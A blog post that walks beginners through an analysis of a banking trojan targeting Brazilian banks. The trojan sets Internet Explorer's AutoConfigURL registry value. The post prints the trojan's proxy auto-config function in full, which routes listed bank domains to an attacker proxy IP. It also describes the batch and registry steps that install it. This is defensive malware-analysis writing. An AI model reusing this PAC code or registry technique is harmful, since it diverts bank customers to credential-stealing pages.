HomeMalware Analysis Financial Crimewares Traversing a Financial Crimeware which uses Proxy Technique

Traversing a Financial Crimeware which uses Proxy Technique

Written by traversecode on . Posted in Financial Crimewares, Malware Analysis

Here I am going to ‘Traverse’ a Financial Crimeware which uses a simple Proxy technique. Intension of this analysis is to share my analysis for the beginners.

But what is Financial Crimeware?

The Malware or an Exploit are made to steal financial information such as Bank account number, password, credit card number, etc with an intension of making unauthorized transactions using the stolen information.

This Crimeware is packed using UPX packer so I did not have much challenge in unpacking. When I saw the strings of unpacked file I got an idea of what this file gonna do.

This Trojan on execution reports its Command and Control server with the computer name that it has infected a machine, as shown in the below screenshot,

image

And then it creates a batch file in %rootdrive% as shown below,

image

What is Edt.reg in the above screenshot?

Edt.reg contain a Registry value which has to be added in the registry as shown below,

image

So the batch file is responsible to register the key and deletes ‘Edt.reg’ file from the %rootdrive% location.

But why this Trojan has to do this?

The reason for adding the URL in the registry because the value ‘AutoConfigURL’ pointing to the URL acts as a Proxy while using Internet Explorer. So when a user access a website using IE in the infected machine, the remote website decides where to route the user based on the condition set.

In our case the file ‘file.pac’ in the remote server has below function,

function FindProxyForURL(url, host) {
    var n = new Array("www.bradesco.com.br", "bradesco.com.br", "www.santander.com.br", "santander.com.br", "www.banespa.com.br", "banespa.com.br", "www.santanderbanespa.com.br", "santanderbanespa.com.br", "www.real.com.br", "real.com.br", "bancoreal.com.br", "www.bancoreal.com.br", "www.itau.com.br", "itau.com.br", "www.banrisul.com.br", "banrisul.com.br", "www.bancodobrasil.com.br", "www.bb.com.br", "bancodobrasil.com.br", "bb.com.br", "www.unibanco.com.br", "unibanco.com.br", "internetbanking.caixa.gov.br", "www.caixa.gov.br", "caixa.gov.br");
    for (var i = 0; i < n.length; i++) {
        if (shExpMatch(host, n[i])) {
            return "PROXY 69.175.64.147:80";
        }
    }
    return "DIRECT";
}

It is very clear that it targets Brazilian Financial Institutions. It routes all the users in the infected machine to the IP address 69.175.64.147. So let me capture the packets and put the screen shot below.

image

In the above network capture you can see the Get request I made is to ‘http://bradesco.com.br’, but the pages are loaded from the IP 69.175.64.147 which is a Malicious proxy.

When I type a junk account number from the clean system bank says details are invalid.

image

But in the infected machine the remote proxy takes me to the next page which asks for more information as shown in the below screenshot,

image

Conclusion:

This is a very simple way used by the Trojan writer to steal Financial information by routing the Bank related websites to the malicious proxy to capture user credentials.

Trackback from your site.

Comments (8)

Leave a comment